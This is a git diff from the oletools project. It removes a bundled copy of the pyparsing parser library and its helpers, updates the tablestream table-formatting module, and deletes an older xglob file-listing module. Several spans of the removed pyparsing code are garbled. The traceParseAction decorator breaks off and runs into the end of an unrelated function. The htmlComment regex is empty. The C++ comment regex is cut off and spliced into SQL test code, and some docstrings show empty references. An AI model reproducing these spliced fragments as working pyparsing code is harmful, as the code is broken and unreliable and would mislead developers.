- """Converter to concatenate all matching tokens to a single string.
- By default, the matching patterns must also be contiguous in the input string;
- this can be disabled by specifying C{'adjacent=False'} in the constructor.
- """
- def __init__( self, expr, joinString="", adjacent=True ):
- super(Combine,self).__init__( expr )
- # suppress whitespace-stripping in contained parse expressions, but re-enable it on the Combine itself
- if adjacent:
- self.leaveWhitespace()
- self.adjacent = adjacent
- self.skipWhitespace = True
- self.joinString = joinString
- self.callPreparse = True
-
- def ignore( self, other ):
- if self.adjacent:
- ParserElement.ignore(self, other)
- else:
- super( Combine, self).ignore( other )
- return self
-
- def postParse( self, instring, loc, tokenlist ):
- retToks = tokenlist.copy()
- del retToks[:]
- retToks += ParseResults([ "".join(tokenlist._asStringList(self.joinString)) ], modal=self.modalResults)
-
- if self.resultsName and retToks.haskeys():
- return [ retToks ]
- else:
- return retToks
-
-class Group(TokenConverter):
- """Converter to return the matched tokens as a list - useful for returning tokens of C{L{ZeroOrMore}} and C{L{OneOrMore}} expressions."""
- def __init__( self, expr ):
- super(Group,self).__init__( expr )
- self.saveAsList = True
-
- def postParse( self, instring, loc, tokenlist ):
- return [ tokenlist ]
-
-class Dict(TokenConverter):
- """Converter to return a repetitive expression as a list, but also as a dictionary.
- Each element can also be referenced using the first token in the expression as its key.
- Useful for tabular report scraping when the first column can be used as a item key.
- """
- def __init__( self, expr ):
- super(Dict,self).__init__( expr )
- self.saveAsList = True
-
- def postParse( self, instring, loc, tokenlist ):
- for i,tok in enumerate(tokenlist):
- if len(tok) == 0:
- continue
- ikey = tok[0]
- if isinstance(ikey,int):
- ikey = _ustr(tok[0]).strip()
- if len(tok)==1:
- tokenlist[ikey] = _ParseResultsWithOffset("",i)
- elif len(tok)==2 and not isinstance(tok[1],ParseResults):
- tokenlist[ikey] = _ParseResultsWithOffset(tok[1],i)
- else:
- dictvalue = tok.copy() #ParseResults(i)
- del dictvalue[0]
- if len(dictvalue)!= 1 or (isinstance(dictvalue,ParseResults) and dictvalue.haskeys()):
- tokenlist[ikey] = _ParseResultsWithOffset(dictvalue,i)
- else:
- tokenlist[ikey] = _ParseResultsWithOffset(dictvalue[0],i)
-
- if self.resultsName:
- return [ tokenlist ]
- else:
- return tokenlist
-
-
-class Suppress(TokenConverter):
- """Converter for ignoring the results of a parsed expression."""
- def postParse( self, instring, loc, tokenlist ):
- return []
-
- def suppress( self ):
- return self
-
-
-class OnlyOnce(object):
- """Wrapper for parse actions, to ensure they are only called once."""
- def __init__(self, methodCall):
- self.callable = _trim_arity(methodCall)
- self.called = False
- def __call__(self,s,l,t):
- if not self.called:
- results = self.callable(s,l,t)
- self.called = True
- return results
- raise ParseException(s,l,"")
- def reset(self):
- self.called = False
-
-def traceParseAction(f):
- """Decorator for debugging parse actions."""
- f = _trim_arity(f)
- def z(*paArgs):
- thisFunc = f.func_name
- s,l,t = paArgs[-3:]
- if len(paArgs)>3:
- thisFunc = paArgs[0].__class__.__name__ + '.' + thisFunc
- sys.stderr.write( ">>entering %s(line: '%s', %d, %s)\n" % (thisFunc,line(l,s),l,t) )
- try:
- ret = f(*paArgs)
- except Exception as exc:
- sys.stderr.write( "<", "|".join( [ _escapeRegexChars(sym) for sym in symbols] ))
- try:
- if len(symbols)==len("".join(symbols)):
- return Regex( "[%s]" % "".join(_escapeRegexRangeChars(sym) for sym in symbols) )
- else:
- return Regex( "|".join(re.escape(sym) for sym in symbols) )
- except:
- warnings.warn("Exception creating Regex for oneOf, building MatchFirst",
- SyntaxWarning, stacklevel=2)
-
-
- # last resort, just use MatchFirst
- return MatchFirst( [ parseElementClass(sym) for sym in symbols ] )
-
-def dictOf( key, value ):
- """Helper to easily and clearly define a dictionary by specifying the respective patterns
- for the key and value. Takes care of defining the C{L{Dict}}, C{L{ZeroOrMore}}, and C{L{Group}} tokens
- in the proper order. The key pattern can include delimiting markers or punctuation,
- as long as they are suppressed, thereby leaving the significant key text. The value
- pattern can include named results, so that the C{Dict} results can include named token
- fields.
- """
- return Dict( ZeroOrMore( Group ( key + value ) ) )
-
-def originalTextFor(expr, asString=True):
- """Helper to return the original, untokenized text for a given expression. Useful to
- restore the parsed fields of an HTML start tag into the raw tag text itself, or to
- revert separate tokens with intervening whitespace back to the original matching
- input text. Simpler to use than the parse action C{L{keepOriginalText}}, and does not
- require the inspect module to chase up the call stack. By default, returns a
- string containing the original parsed text.
-
- If the optional C{asString} argument is passed as C{False}, then the return value is a
- C{L{ParseResults}} containing any results names that were originally matched, and a
- single token containing the original matched text from the input string. So if
- the expression passed to C{L{originalTextFor}} contains expressions with defined
- results names, you must set C{asString} to C{False} if you want to preserve those
- results name values."""
- locMarker = Empty().setParseAction(lambda s,loc,t: loc)
- endlocMarker = locMarker.copy()
- endlocMarker.callPreparse = False
- matchExpr = locMarker("_original_start") + expr + endlocMarker("_original_end")
- if asString:
- extractText = lambda s,l,t: s[t._original_start:t._original_end]
- else:
- def extractText(s,l,t):
- del t[:]
- t.insert(0, s[t._original_start:t._original_end])
- del t["_original_start"]
- del t["_original_end"]
- matchExpr.setParseAction(extractText)
- return matchExpr
-
-def ungroup(expr):
- """Helper to undo pyparsing's default grouping of And expressions, even
- if all but one are non-empty."""
- return TokenConverter(expr).setParseAction(lambda t:t[0])
-
-def locatedExpr(expr):
- """Helper to decorate a returned token with its starting and ending locations in the input string.
- This helper adds the following results names:
- - locn_start = location where matched expression begins
- - locn_end = location where matched expression ends
- - value = the actual parsed results
-
- Be careful if the input text contains C{} characters, you may want to call
- C{L{ParserElement.parseWithTabs}}
- """
- locator = Empty().setParseAction(lambda s,l,t: l)
- return Group(locator("locn_start") + expr("value") + locator.copy().leaveWhitespace()("locn_end"))
-
-
-# convenience constants for positional expressions
-empty = Empty().setName("empty")
-lineStart = LineStart().setName("lineStart")
-lineEnd = LineEnd().setName("lineEnd")
-stringStart = StringStart().setName("stringStart")
-stringEnd = StringEnd().setName("stringEnd")
-
-_escapedPunc = Word( _bslash, r"\[]-*.$+^?()~ ", exact=2 ).setParseAction(lambda s,l,t:t[0][1])
-_escapedHexChar = Regex(r"\\0?[xX][0-9a-fA-F]+").setParseAction(lambda s,l,t:unichr(int(t[0].lstrip(r'\0x'),16)))
-_escapedOctChar = Regex(r"\\0[0-7]+").setParseAction(lambda s,l,t:unichr(int(t[0][1:],8)))
-_singleChar = _escapedPunc | _escapedHexChar | _escapedOctChar | Word(printables, excludeChars=r'\]', exact=1)
-_charRange = Group(_singleChar + Suppress("-") + _singleChar)
-_reBracketExpr = Literal("[") + Optional("^").setResultsName("negate") + Group( OneOrMore( _charRange | _singleChar ) ).setResultsName("body") + "]"
-
-def srange(s):
- r"""Helper to easily define string ranges for use in Word construction. Borrows
- syntax from regexp '[]' string range definitions::
- srange("[0-9]") -> "0123456789"
- srange("[a-z]") -> "abcdefghijklmnopqrstuvwxyz"
- srange("[a-z$_]") -> "abcdefghijklmnopqrstuvwxyz$_"
- The input string must be enclosed in []'s, and the returned string is the expanded
- character set joined into a single string.
- The values enclosed in the []'s may be::
- a single character
- an escaped character with a leading backslash (such as \- or \])
- an escaped hex character with a leading '\x' (\x21, which is a '!' character)
- (\0x## is also supported for backwards compatibility)
- an escaped octal character with a leading '\0' (\041, which is a '!' character)
- a range of any of the above, separated by a dash ('a-z', etc.)
- any combination of the above ('aeiouy', 'a-zA-Z0-9_$', etc.)
- """
- _expanded = lambda p: p if not isinstance(p,ParseResults) else ''.join(unichr(c) for c in range(ord(p[0]),ord(p[1])+1))
- try:
- return "".join(_expanded(part) for part in _reBracketExpr.parseString(s).body)
- except:
- return ""
-
-def matchOnlyAtCol(n):
- """Helper method for defining parse actions that require matching at a specific
- column in the input text.
- """
- def verifyCol(strg,locn,toks):
- if col(locn,strg) != n:
- raise ParseException(strg,locn,"matched token not at column %d" % n)
- return verifyCol
-
-def replaceWith(replStr):
- """Helper method for common parse actions that simply return a literal value. Especially
- useful when used with C{L{transformString}()}.
- """
- def _replFunc(*args):
- return [replStr]
- return _replFunc
-
-def removeQuotes(s,l,t):
- """Helper parse action for removing quotation marks from parsed quoted strings.
- To use, add this parse action to quoted string using::
- quotedString.setParseAction( removeQuotes )
- """
- return t[0][1:-1]
-
-def upcaseTokens(s,l,t):
- """Helper parse action to convert tokens to upper case."""
- return [ tt.upper() for tt in map(_ustr,t) ]
-
-def downcaseTokens(s,l,t):
- """Helper parse action to convert tokens to lower case."""
- return [ tt.lower() for tt in map(_ustr,t) ]
-
-def keepOriginalText(s,startLoc,t):
- """DEPRECATED - use new helper method C{L{originalTextFor}}.
- Helper parse action to preserve original parsed text,
- overriding any nested parse actions."""
- try:
- endloc = getTokensEndLoc()
- except ParseException:
- raise ParseFatalException("incorrect usage of keepOriginalText - may only be called as a parse action")
- del t[:]
- t += ParseResults(s[startLoc:endloc])
- return t
-
-def getTokensEndLoc():
- """Method to be called from within a parse action to determine the end
- location of the parsed tokens."""
- import inspect
- fstack = inspect.stack()
- try:
- # search up the stack (through intervening argument normalizers) for correct calling routine
- for f in fstack[2:]:
- if f[3] == "_parseNoCache":
- endloc = f[0].f_locals["loc"]
- return endloc
- else:
- raise ParseFatalException("incorrect usage of getTokensEndLoc - may only be called from within a parse action")
- finally:
- del fstack
-
-def _makeTags(tagStr, xml):
- """Internal helper to construct opening and closing tag expressions, given a tag name"""
- if isinstance(tagStr,basestring):
- resname = tagStr
- tagStr = Keyword(tagStr, caseless=not xml)
- else:
- resname = tagStr.name
-
- tagAttrName = Word(alphas,alphanums+"_-:")
- if (xml):
- tagAttrValue = dblQuotedString.copy().setParseAction( removeQuotes )
- openTag = Suppress("<") + tagStr("tag") + \
- Dict(ZeroOrMore(Group( tagAttrName + Suppress("=") + tagAttrValue ))) + \
- Optional("/",default=[False]).setResultsName("empty").setParseAction(lambda s,l,t:t[0]=='/') + Suppress(">")
- else:
- printablesLessRAbrack = "".join(c for c in printables if c not in ">")
- tagAttrValue = quotedString.copy().setParseAction( removeQuotes ) | Word(printablesLessRAbrack)
- openTag = Suppress("<") + tagStr("tag") + \
- Dict(ZeroOrMore(Group( tagAttrName.setParseAction(downcaseTokens) + \
- Optional( Suppress("=") + tagAttrValue ) ))) + \
- Optional("/",default=[False]).setResultsName("empty").setParseAction(lambda s,l,t:t[0]=='/') + Suppress(">")
- closeTag = Combine(_L("") + tagStr + ">")
-
- openTag = openTag.setResultsName("start"+"".join(resname.replace(":"," ").title().split())).setName("<%s>" % tagStr)
- closeTag = closeTag.setResultsName("end"+"".join(resname.replace(":"," ").title().split())).setName("%s>" % tagStr)
- openTag.tag = resname
- closeTag.tag = resname
- return openTag, closeTag
-
-def makeHTMLTags(tagStr):
- """Helper to construct opening and closing tag expressions for HTML, given a tag name"""
- return _makeTags( tagStr, False )
-
-def makeXMLTags(tagStr):
- """Helper to construct opening and closing tag expressions for XML, given a tag name"""
- return _makeTags( tagStr, True )
-
-def withAttribute(*args,**attrDict):
- """Helper to create a validating parse action to be used with start tags created
- with C{L{makeXMLTags}} or C{L{makeHTMLTags}}. Use C{withAttribute} to qualify a starting tag
- with a required attribute value, to avoid false matches on common tags such as
- C{} or C{}.
-
- Call C{withAttribute} with a series of attribute names and values. Specify the list
- of filter attributes names and values as:
- - keyword arguments, as in C{(align="right")}, or
- - as an explicit dict with C{**} operator, when an attribute name is also a Python
- reserved word, as in C{**{"class":"Customer", "align":"right"}}
- - a list of name-value tuples, as in ( ("ns1:class", "Customer"), ("ns2:align","right") )
- For attribute names with a namespace prefix, you must use the second form. Attribute
- names are matched insensitive to upper/lower case.
-
- To verify that the attribute exists, but without specifying a value, pass
- C{withAttribute.ANY_VALUE} as the value.
- """
- if args:
- attrs = args[:]
- else:
- attrs = attrDict.items()
- attrs = [(k,v) for k,v in attrs]
- def pa(s,l,tokens):
- for attrName,attrValue in attrs:
- if attrName not in tokens:
- raise ParseException(s,l,"no matching attribute " + attrName)
- if attrValue != withAttribute.ANY_VALUE and tokens[attrName] != attrValue:
- raise ParseException(s,l,"attribute '%s' has value '%s', must be '%s'" %
- (attrName, tokens[attrName], attrValue))
- return pa
-withAttribute.ANY_VALUE = object()
-
-opAssoc = _Constants()
-opAssoc.LEFT = object()
-opAssoc.RIGHT = object()
-
-def infixNotation( baseExpr, opList, lpar=Suppress('('), rpar=Suppress(')') ):
- """Helper method for constructing grammars of expressions made up of
- operators working in a precedence hierarchy. Operators may be unary or
- binary, left- or right-associative. Parse actions can also be attached
- to operator expressions.
-
- Parameters:
- - baseExpr - expression representing the most basic element for the nested
- - opList - list of tuples, one for each operator precedence level in the
- expression grammar; each tuple is of the form
- (opExpr, numTerms, rightLeftAssoc, parseAction), where:
- - opExpr is the pyparsing expression for the operator;
- may also be a string, which will be converted to a Literal;
- if numTerms is 3, opExpr is a tuple of two expressions, for the
- two operators separating the 3 terms
- - numTerms is the number of terms for this operator (must
- be 1, 2, or 3)
- - rightLeftAssoc is the indicator whether the operator is
- right or left associative, using the pyparsing-defined
- constants C{opAssoc.RIGHT} and C{opAssoc.LEFT}.
- - parseAction is the parse action to be associated with
- expressions matching this operator expression (the
- parse action tuple member may be omitted)
- - lpar - expression for matching left-parentheses (default=Suppress('('))
- - rpar - expression for matching right-parentheses (default=Suppress(')'))
- """
- ret = Forward()
- lastExpr = baseExpr | ( lpar + ret + rpar )
- for i,operDef in enumerate(opList):
- opExpr,arity,rightLeftAssoc,pa = (operDef + (None,))[:4]
- if arity == 3:
- if opExpr is None or len(opExpr) != 2:
- raise ValueError("if numterms=3, opExpr must be a tuple or list of two expressions")
- opExpr1, opExpr2 = opExpr
- thisExpr = Forward()#.setName("expr%d" % i)
- if rightLeftAssoc == opAssoc.LEFT:
- if arity == 1:
- matchExpr = FollowedBy(lastExpr + opExpr) + Group( lastExpr + OneOrMore( opExpr ) )
- elif arity == 2:
- if opExpr is not None:
- matchExpr = FollowedBy(lastExpr + opExpr + lastExpr) + Group( lastExpr + OneOrMore( opExpr + lastExpr ) )
- else:
- matchExpr = FollowedBy(lastExpr+lastExpr) + Group( lastExpr + OneOrMore(lastExpr) )
- elif arity == 3:
- matchExpr = FollowedBy(lastExpr + opExpr1 + lastExpr + opExpr2 + lastExpr) + \
- Group( lastExpr + opExpr1 + lastExpr + opExpr2 + lastExpr )
- else:
- raise ValueError("operator must be unary (1), binary (2), or ternary (3)")
- elif rightLeftAssoc == opAssoc.RIGHT:
- if arity == 1:
- # try to avoid LR with this extra test
- if not isinstance(opExpr, Optional):
- opExpr = Optional(opExpr)
- matchExpr = FollowedBy(opExpr.expr + thisExpr) + Group( opExpr + thisExpr )
- elif arity == 2:
- if opExpr is not None:
- matchExpr = FollowedBy(lastExpr + opExpr + thisExpr) + Group( lastExpr + OneOrMore( opExpr + thisExpr ) )
- else:
- matchExpr = FollowedBy(lastExpr + thisExpr) + Group( lastExpr + OneOrMore( thisExpr ) )
- elif arity == 3:
- matchExpr = FollowedBy(lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr) + \
- Group( lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr )
- else:
- raise ValueError("operator must be unary (1), binary (2), or ternary (3)")
- else:
- raise ValueError("operator must indicate right or left associativity")
- if pa:
- matchExpr.setParseAction( pa )
- thisExpr <<= ( matchExpr | lastExpr )
- lastExpr = thisExpr
- ret <<= lastExpr
- return ret
-operatorPrecedence = infixNotation
-
-dblQuotedString = Regex(r'"(?:[^"\n\r\\]|(?:"")|(?:\\x[0-9a-fA-F]+)|(?:\\.))*"').setName("string enclosed in double quotes")
-sglQuotedString = Regex(r"'(?:[^'\n\r\\]|(?:'')|(?:\\x[0-9a-fA-F]+)|(?:\\.))*'").setName("string enclosed in single quotes")
-quotedString = Regex(r'''(?:"(?:[^"\n\r\\]|(?:"")|(?:\\x[0-9a-fA-F]+)|(?:\\.))*")|(?:'(?:[^'\n\r\\]|(?:'')|(?:\\x[0-9a-fA-F]+)|(?:\\.))*')''').setName("quotedString using single or double quotes")
-unicodeString = Combine(_L('u') + quotedString.copy())
-
-def nestedExpr(opener="(", closer=")", content=None, ignoreExpr=quotedString.copy()):
- """Helper method for defining nested lists enclosed in opening and closing
- delimiters ("(" and ")" are the default).
-
- Parameters:
- - opener - opening character for a nested list (default="("); can also be a pyparsing expression
- - closer - closing character for a nested list (default=")"); can also be a pyparsing expression
- - content - expression for items within the nested lists (default=None)
- - ignoreExpr - expression for ignoring opening and closing delimiters (default=quotedString)
-
- If an expression is not provided for the content argument, the nested
- expression will capture all whitespace-delimited content between delimiters
- as a list of separate values.
-
- Use the C{ignoreExpr} argument to define expressions that may contain
- opening or closing characters that should not be treated as opening
- or closing characters for nesting, such as quotedString or a comment
- expression. Specify multiple expressions using an C{L{Or}} or C{L{MatchFirst}}.
- The default is L{quotedString}, but if no expressions are to be ignored,
- then pass C{None} for this argument.
- """
- if opener == closer:
- raise ValueError("opening and closing strings cannot be the same")
- if content is None:
- if isinstance(opener,basestring) and isinstance(closer,basestring):
- if len(opener) == 1 and len(closer)==1:
- if ignoreExpr is not None:
- content = (Combine(OneOrMore(~ignoreExpr +
- CharsNotIn(opener+closer+ParserElement.DEFAULT_WHITE_CHARS,exact=1))
- ).setParseAction(lambda t:t[0].strip()))
- else:
- content = (empty.copy()+CharsNotIn(opener+closer+ParserElement.DEFAULT_WHITE_CHARS
- ).setParseAction(lambda t:t[0].strip()))
- else:
- if ignoreExpr is not None:
- content = (Combine(OneOrMore(~ignoreExpr +
- ~Literal(opener) + ~Literal(closer) +
- CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS,exact=1))
- ).setParseAction(lambda t:t[0].strip()))
- else:
- content = (Combine(OneOrMore(~Literal(opener) + ~Literal(closer) +
- CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS,exact=1))
- ).setParseAction(lambda t:t[0].strip()))
- else:
- raise ValueError("opening and closing arguments must be strings if no content expression is given")
- ret = Forward()
- if ignoreExpr is not None:
- ret <<= Group( Suppress(opener) + ZeroOrMore( ignoreExpr | ret | content ) + Suppress(closer) )
- else:
- ret <<= Group( Suppress(opener) + ZeroOrMore( ret | content ) + Suppress(closer) )
- return ret
-
-def indentedBlock(blockStatementExpr, indentStack, indent=True):
- """Helper method for defining space-delimited indentation blocks, such as
- those used to define block statements in Python source code.
-
- Parameters:
- - blockStatementExpr - expression defining syntax of statement that
- is repeated within the indented block
- - indentStack - list created by caller to manage indentation stack
- (multiple statementWithIndentedBlock expressions within a single grammar
- should share a common indentStack)
- - indent - boolean indicating whether block must be indented beyond the
- the current level; set to False for block of left-most statements
- (default=True)
-
- A valid block must contain at least one C{blockStatement}.
- """
- def checkPeerIndent(s,l,t):
- if l >= len(s): return
- curCol = col(l,s)
- if curCol != indentStack[-1]:
- if curCol > indentStack[-1]:
- raise ParseFatalException(s,l,"illegal nesting")
- raise ParseException(s,l,"not a peer entry")
-
- def checkSubIndent(s,l,t):
- curCol = col(l,s)
- if curCol > indentStack[-1]:
- indentStack.append( curCol )
- else:
- raise ParseException(s,l,"not a subentry")
-
- def checkUnindent(s,l,t):
- if l >= len(s): return
- curCol = col(l,s)
- if not(indentStack and curCol < indentStack[-1] and curCol <= indentStack[-2]):
- raise ParseException(s,l,"not an unindent")
- indentStack.pop()
-
- NL = OneOrMore(LineEnd().setWhitespaceChars("\t ").suppress())
- INDENT = Empty() + Empty().setParseAction(checkSubIndent)
- PEER = Empty().setParseAction(checkPeerIndent)
- UNDENT = Empty().setParseAction(checkUnindent)
- if indent:
- smExpr = Group( Optional(NL) +
- #~ FollowedBy(blockStatementExpr) +
- INDENT + (OneOrMore( PEER + Group(blockStatementExpr) + Optional(NL) )) + UNDENT)
- else:
- smExpr = Group( Optional(NL) +
- (OneOrMore( PEER + Group(blockStatementExpr) + Optional(NL) )) )
- blockStatementExpr.ignore(_bslash + LineEnd())
- return smExpr
-
-alphas8bit = srange(r"[\0xc0-\0xd6\0xd8-\0xf6\0xf8-\0xff]")
-punc8bit = srange(r"[\0xa1-\0xbf\0xd7\0xf7]")
-
-anyOpenTag,anyCloseTag = makeHTMLTags(Word(alphas,alphanums+"_:"))
-commonHTMLEntity = Combine(_L("&") + oneOf("gt lt amp nbsp quot").setResultsName("entity") +";").streamline()
-_htmlEntityMap = dict(zip("gt lt amp nbsp quot".split(),'><& "'))
-replaceHTMLEntity = lambda t : t.entity in _htmlEntityMap and _htmlEntityMap[t.entity] or None
-
-# it's easy to get these comment structures wrong - they're very common, so may as well make them available
-cStyleComment = Regex(r"/\*(?:[^*]*\*+)+?/").setName("C style comment")
-
-htmlComment = Regex(r"")
-restOfLine = Regex(r".*").leaveWhitespace()
-dblSlashComment = Regex(r"\/\/(\\\n|.)*").setName("// comment")
-cppStyleComment = Regex(r"/(?:\*(?:[^*]*\*+)+?/|/[^\n]*(?:\n[^\n]*)*?(?:(?" + str(tokenlist))
- print ("tokens = " + str(tokens))
- print ("tokens.columns = " + str(tokens.columns))
- print ("tokens.tables = " + str(tokens.tables))
- print (tokens.asXML("SQL",True))
- except ParseBaseException as err:
- print (teststring + "->")
- print (err.line)
- print (" "*(err.column-1) + "^")
- print (err)
- print()
-
- selectToken = CaselessLiteral( "select" )
- fromToken = CaselessLiteral( "from" )
-
- ident = Word( alphas, alphanums + "_$" )
- columnName = delimitedList( ident, ".", combine=True ).setParseAction( upcaseTokens )
- columnNameList = Group( delimitedList( columnName ) )#.setName("columns")
- tableName = delimitedList( ident, ".", combine=True ).setParseAction( upcaseTokens )
- tableNameList = Group( delimitedList( tableName ) )#.setName("tables")
- simpleSQL = ( selectToken + \
- ( '*' | columnNameList ).setResultsName( "columns" ) + \
- fromToken + \
- tableNameList.setResultsName( "tables" ) )
-
- test( "SELECT * from XYZZY, ABC" )
- test( "select * from SYS.XYZZY" )
- test( "Select A from Sys.dual" )
- test( "Select AA,BB,CC from Sys.dual" )
- test( "Select A, B, C from Sys.dual" )
- test( "Select A, B, C from Sys.dual" )
- test( "Xelect A, B, C from Sys.dual" )
- test( "Select A, B, C frox Sys.dual" )
- test( "Select" )
- test( "Select ^^^ frox Sys.dual" )
- test( "Select A, B, C from Sys.dual, Table2 " )
diff --git a/oletools/thirdparty/tablestream/tablestream.py b/oletools/thirdparty/tablestream/tablestream.py
index 3a7df4f1..cd5a9246 100644
--- a/oletools/thirdparty/tablestream/tablestream.py
+++ b/oletools/thirdparty/tablestream/tablestream.py
@@ -19,7 +19,7 @@
#=== LICENSE ==================================================================
-# tablestream is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info)
+# tablestream is copyright (c) 2015-2018 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -54,8 +54,10 @@
# 2016-07-31 v0.06 PL: - handle newline characters properly in each cell
# 2016-08-28 v0.07 PL: - support for both Python 2.6+ and 3.x
# - all cells are converted to unicode
+# 2018-09-22 v0.08 PL: - removed mention to oletools' thirdparty folder
+# 2019-03-27 v0.09 PL: - slight fix, TableStyleSlim inherits from TableStyle
-__version__ = '0.07'
+__version__ = '0.09'
#------------------------------------------------------------------------------
# TODO:
@@ -70,15 +72,6 @@
import textwrap
import sys, os
-# add the thirdparty subfolder to sys.path (absolute+normalized path):
-_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
-# assumption: this module is in a subfolder of thirdparty:
-_thirdparty_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_thirdparty_dir = %r' % _thirdparty_dir)
-if not _thirdparty_dir in sys.path:
- sys.path.insert(0, _thirdparty_dir)
-
import colorclass
# On Windows, colorclass needs to be enabled:
@@ -182,7 +175,7 @@ class TableStyle(object):
bottom_right = u'+'
-class TableStyleSlim(object):
+class TableStyleSlim(TableStyle):
"""
Style for a TableStream.
Example:
diff --git a/oletools/thirdparty/xglob/xglob.py b/oletools/thirdparty/xglob/xglob.py
index d8f14ed6..c83cf90c 100644
--- a/oletools/thirdparty/xglob/xglob.py
+++ b/oletools/thirdparty/xglob/xglob.py
@@ -1,208 +1,214 @@
-#! /usr/bin/env python2
-"""
-xglob
-
-xglob is a python package to list files matching wildcards (*, ?, []),
-extending the functionality of the glob module from the standard python
-library (https://docs.python.org/2/library/glob.html).
-
-Main features:
-- recursive file listing (including subfolders)
-- file listing within Zip archives
-- helper function to open files specified as arguments, supporting files
- within zip archives encrypted with a password
-
-Author: Philippe Lagadec - http://www.decalage.info
-License: BSD, see source code or documentation
-
-For more info and updates: http://www.decalage.info/xglob
-"""
-
-# LICENSE:
-#
-# xglob is copyright (c) 2013-2016, Philippe Lagadec (http://www.decalage.info)
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-#------------------------------------------------------------------------------
-# CHANGELOG:
-# 2013-12-04 v0.01 PL: - scan several files from command line args
-# 2014-01-14 v0.02 PL: - added riglob, ziglob
-# 2014-12-26 v0.03 PL: - moved code from balbuzard into a separate package
-# 2015-01-03 v0.04 PL: - fixed issues in iter_files + yield container name
-# 2016-02-24 v0.05 PL: - do not stop on exceptions, return them as data
-# - fixed issue when using wildcards with empty path
-# 2016-04-28 v0.06 CH: - improved handling of non-existing files
-# (by Christian Herdtweck)
-
-__version__ = '0.06'
-
-
-#=== IMPORTS =================================================================
-
-import os, fnmatch, glob, zipfile
-
-#=== EXCEPTIONS ==============================================================
-
-class PathNotFoundException(Exception):
- """ raised if given a fixed file/dir (not a glob) that does not exist """
- def __init__(self, path):
- super(PathNotFoundException, self).__init__(
- 'Given path does not exist: %r' % path)
-
-
-#=== FUNCTIONS ===============================================================
-
-# recursive glob function to find files in any subfolder:
-# inspired by http://stackoverflow.com/questions/14798220/how-can-i-search-sub-folders-using-glob-glob-module-in-python
-def rglob (path, pattern='*.*'):
- """
- Recursive glob:
- similar to glob.glob, but finds files recursively in all subfolders of path.
- path: root directory where to search files
- pattern: pattern for filenames, using wildcards, e.g. *.txt
- """
- #TODO: more compatible API with glob: use single param, split path from pattern
- return [os.path.join(dirpath, f)
- for dirpath, dirnames, files in os.walk(path)
- for f in fnmatch.filter(files, pattern)]
-
-
-def riglob (pathname):
- """
- Recursive iglob:
- similar to glob.iglob, but finds files recursively in all subfolders of path.
- pathname: root directory where to search files followed by pattern for
- filenames, using wildcards, e.g. *.txt
- """
- path, filespec = os.path.split(pathname)
- # fix path if empty:
- if path == '':
- path = '.'
- # print 'riglob: path=%r, filespec=%r' % (path, filespec)
- for dirpath, dirnames, files in os.walk(path):
- for f in fnmatch.filter(files, filespec):
- yield os.path.join(dirpath, f)
-
-
-def ziglob (zipfileobj, pathname):
- """
- iglob in a zip:
- similar to glob.iglob, but finds files within a zip archive.
- - zipfileobj: zipfile.ZipFile object
- - pathname: root directory where to search files followed by pattern for
- filenames, using wildcards, e.g. *.txt
- """
- files = zipfileobj.namelist()
- #for f in files: print f
- for f in fnmatch.filter(files, pathname):
- yield f
-
-
-def iter_files(files, recursive=False, zip_password=None, zip_fname='*'):
- """
- Open each file provided as argument:
- - files is a list of arguments
- - if zip_password is None, each file is listed without reading its content.
- Wilcards are supported.
- - if not, then each file is opened as a zip archive with the provided password
- - then files matching zip_fname are opened from the zip archive
-
- Iterator: yields (container, filename, data) for each file. If zip_password is None, then
- only the filename is returned, container and data=None. Otherwise container is the
- filename of the container (zip file), and data is the file content (or an exception).
- If a given filename is not a glob and does not exist, the triplet
- (None, filename, PathNotFoundException) is yielded. (Globs matching nothing
- do not trigger exceptions)
- """
- #TODO: catch exceptions and yield them for the caller (no file found, file is not zip, wrong password, etc)
- #TODO: use logging instead of printing
- #TODO: split in two simpler functions, the caller knows if it's a zip or not
- # print 'iter_files: files=%r, recursive=%s' % (files, recursive)
- # choose recursive or non-recursive iglob:
- if recursive:
- iglob = riglob
- else:
- iglob = glob.iglob
- for filespec in files:
- if not is_glob(filespec) and not os.path.exists(filespec):
- yield None, filespec, PathNotFoundException(filespec)
- continue
- for filename in iglob(filespec):
- if zip_password is not None:
- # Each file is expected to be a zip archive:
- #print 'Opening zip archive %s with provided password' % filename
- z = zipfile.ZipFile(filename, 'r')
- #print 'Looking for file(s) matching "%s"' % zip_fname
- for subfilename in ziglob(z, zip_fname):
- #print 'Opening file in zip archive:', filename
- try:
- data = z.read(subfilename, zip_password)
- yield filename, subfilename, data
- except Exception as e:
- yield filename, subfilename, e
- z.close()
- else:
- # normal file
- # do not read the file content, just yield the filename
- yield None, filename, None
